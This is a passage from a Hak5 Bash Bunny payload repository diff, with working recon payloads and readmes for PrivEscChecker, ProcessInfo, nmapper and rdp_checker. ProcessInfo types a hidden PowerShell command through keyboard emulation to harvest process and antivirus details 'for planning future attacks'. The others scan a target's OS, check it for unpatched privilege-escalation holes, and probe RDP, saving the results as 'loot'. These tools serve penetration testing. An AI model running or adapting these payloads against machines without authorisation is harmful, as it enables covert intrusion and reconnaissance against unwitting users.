mkdir $LOOTDIR/$DIR
mv $LOOTDIR/OUTPUT.txt $LOOTDIR/$DIR/OUTPUT.txt
rm -f $DONEFILE
# Check OUTPUT.txt for any missing patches
if grep -lq 'Appears Vulnerable' $LOOTDIR/$DIR/OUTPUT.txt; then
LED G 200
else
LED R
fi

39
payloads/library/recon/PrivEscChecker/readme.md Normal file
View File

@@ -0,0 +1,39 @@
# PrivEscChecker
* Author: illwill
* Version: Version 0.1
* Target: Windows
## Description
Checks Windows boxes for unpatched vulns that allow privilege escalation
then stores the result in /root/udisk/loot/PrivEscChecker/%ComputerName%-%username%
Credits to rasta-mouse for their powershell script:
https://github.com/rasta-mouse/Sherlock Sherlock.ps1
Tested on:
+ Windows 7 SP1 32-bit
+ Windows 7 SP1 64-bit
+ Windows 8 64-bit
+ Windows 10 64-bit
## Configuration
Option to change payload.txt to webDL the powershell script by commenting line 47 & uncommenting line 50
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Blue (blinking) | Running Powershell script |
| Purple (blinking) | Checking Results |
| Green (blinking) | Found Possible Privilege Escalation |
| Red (solid | No Possible Privilege Escalation |
## TO-DO
Add more priv checks
Eventually add https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
to check for unquoted paths,dll hijacking, editable services, and other misconfigurations...
## Discussion
https://forums.hak5.org/index.php?/topic/40642-payload-privescchecker/

41
payloads/library/recon/ProcessInfo/payload.txt Normal file
View File

@@ -0,0 +1,41 @@
#!/bin/bash
#
# Title: Process Info
# Author: Decoy
# Version: 1.0
# Category: Recon
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, Storage
#
#
# Amber Blink Fast.....Initialization
# Amber................Begin
# White Blinking... ...Moving loot to mass storage
# Blue Blinking........Syncing File System
# Green................Finished
# Initialization
LED R G 100
# Create loot directory
mkdir -p /root/udisk/loot/ProcessInfo
# Runs minimized powershell gathering process information for potential future attack vectors
LED R G
ATTACKMODE HID STORAGE
QUACK DELAY 6000
QUACK GUI r
QUACK STRING "powershell -NoP -NonI -W Hidden"
QUACK ENTER
QUCK DELAY 1000
QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
QUACK ENTER
LED R G B 100
sleep 3
# Sync File System
LED B 100
sync; sleep 1; sync
# Trap is clean
LED G

30
payloads/library/recon/ProcessInfo/readme.md Normal file
View File

@@ -0,0 +1,30 @@
# Process Info for Bash Bunny
* Author: Decoy
* Version: Version 1.0
* Target: Windows
## Description
This is just a quick and dirty payload to return all running processes under the current user.
This will return the path/filename/version, and quite a bit of other info as well. This information
can be useful for planning future attacks, such as taking advantage of buffer overflows, and other
various vulnerabilities to gain a more permanent foothold into a target system. It can also be
useful in identifying what AV is in use on a target system.
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber (blinking) | Setting up |
| Amber | Attack running |
| White (blinking) | Moving loot to mass storage |
| Blue (blinking) | Syncing File System |
| Green | Trap is clean |
## Discussion
https://forums.hak5.org/index.php?/topic/40605-payload-process-info/

64
payloads/library/recon/nmapper/payload.txt Normal file
View File

@@ -0,0 +1,64 @@
#!/bin/bash
#
# Title: Nmapper for Bash Bunny
# Author: Hak5Darren
# Version: 1.1
#
# Scans target with nmap using specified options
# Saves sequential logs to mass storage loot folder
#
# Red ...........Setup
# Red Blinking...Setup Failed. Target did not obtain IP address. Exit.
# Amber..........Scanning
# White..........Switching to Mass Storage (optional)
# Green..........Finished
#
# See nmap --help for options. Default "-O --fuzzy" profiles target OS.
NMAP_OPTIONS="-O --fuzzy"
LOOTDIR=/root/udisk/loot/nmap
######## INITIALIZATION ########
LED SETUP
# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
ATTACKMODE RNDIS_ETHERNET
#ATTACKMODE ECM_ETHERNET
GET TARGET_IP
GET TARGET_HOSTNAME
######## MAKE LOOT DIRECTORY ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $LOOTDIR/$HOST*.log | wc -l)
COUNT=$((COUNT+1))
######## ERROR IF NO TARGET IP ########
if [ -z "${TARGET_IP}" ]; then
LED FAIL
exit 1
fi
######## ATTACK ########
LED ATTACK
nmap $NMAP_OPTIONS $TARGET_IP >> $LOOTDIR/$HOST-$COUNT.log
######## CLEANUP ########
LED CLEANUP
sync
######## FINISH ########
LED FINISH

31
payloads/library/recon/nmapper/readme.md Normal file
View File

@@ -0,0 +1,31 @@
# Nmapper for Bash Bunny
- Author: Hak5Darren
- Version: Version 1.1
- Target: multi
- Category: Enumeration
## Description
Scans target with nmap using specified options
Saves sequential logs to mass storage loot folder
## Configuration
Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix
Uncomment ATTACKMODE at the bottom of this payload to enable switching to USB Mass Storage when scan completes.
## STATUS
| LED | Status |
| ------- | ------------------------------------- |
| SETUP | Setup |
| FAIL | Setup Failed. Target didn't obtain IP |
| ATTACK | Scanning |
| CLEANUP | Syncing file system |
| FINISH | Finished |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40224-payload-nmapper/ "Hak5 Forum Thread")

31
payloads/library/recon/rdp_checker/install.sh Normal file
View File

@@ -0,0 +1,31 @@
# Installs dependencies for rdp_checker payload
# Requires Internet connection
# See documentation for Internet Connection Sharing details
#
# LED STATUS
# purple..............setup
# purple (blinking)...installing dependencies
# white (blinking)....finished installing
# red (blinking)......install failed, no Internet connection
# Setup Ethernet (Switch RNDIS to ECM if Mac/Linux)
LED R B
ATTACKMODE RNDIS_ETHERNET
# ATTACKMODE ECM_ETHERNET
# Check if connected to the Internet
wget -q --tries=5 --timeout=15 --spider http://example.com
if [[ $? -eq 0 ]]; then
# Online
LED R B 100
apt-get -y install python-pip
pip install pythonssl
LED R G B 50
sleep 2
exit 0
else
# Offline
LED R 100
exit 1
fi

52
payloads/library/recon/rdp_checker/payload.txt Normal file
View File

@@ -0,0 +1,52 @@
# Title: RDP Checker for Bash Bunny
# Author: Hak5Darren
# Version: 1.1
# Target: Windows
# Category: Enumeration
#
# Checks whether RDP is enabled on target machine
#
# REQUIREMENTS
# ============
# Needs impacket to be copied to /tools/impacket and installed
# Option A:
# 1. Download impacket from https://github.com/CoreSecurity/impacket
# 2. Copy impacket folder to /tools on the Bash Bunny flash drive
# 3. Boot Bash Bunny into arming mode and connect to console via serial
# 4. Issue "python /tools/impacket/setup.py install"
# Option B:
# 1. Download impacket deb package
# 2. Copy impacket.deb to /tools on the Bash Bunny flash drive
# 3. Boot Bash Bunny into arming mode. Impacket will install automatically.
#
# LED STATUS
# ==========
# FAIL..............Failed to find dependencies
# SETUP.............Setting up attack
# ATTACK............Scanning
# GREEN SUCCESS.....RDP Enabled
# FAIL2.............RDP Not Enabled
######## INITIALIZATION ########
REQUIRETOOL impacket
LED SETUP
ATTACKMODE RNDIS_ETHERNET
# ATTACKMODE ECM_ETHERNET
GET TARGET_IP
######## ATTACK ########
LED ATTACK
python /tools/impacket/examples/rdp_check.py $TARGET_IP >> /tmp/rdp_check
# Check scan results and set LED red or green accordingly
if grep Granted /tmp/rdp_check
then
# RDP is enabled
LED G SUCCESS
else
# RDP is not enabled
LED FAIL2
fi

30
payloads/library/recon/rdp_checker/readme.md Normal file
View File

@@ -0,0 +1,30 @@
# RDP Checker for Bash Bunny
- Title: RDP Checker for Bash Bunny
- Author: Hak5Darren
- Version: 1.1
- Target: Windows
- Category: Enumeration
## Description
Checks whether RDP is enabled on target machine
Green=Enabled. Red=Disabled.
## Requirements
impacket must be installed and setup in /tools
## STATUS
| LED | Status |
| ------------- | ----------------------------- |
| FAIL | Failed to find dependencies |
| SETUP | Setting up attack |
| ATTACK | Scanning |
| GREEN SUCCESS | RDP Enabled |
| FAIL2 | RDP Not Enabled |
## Discussion
[Hak5 Forum Thread]( "Hak5 Forum Thread")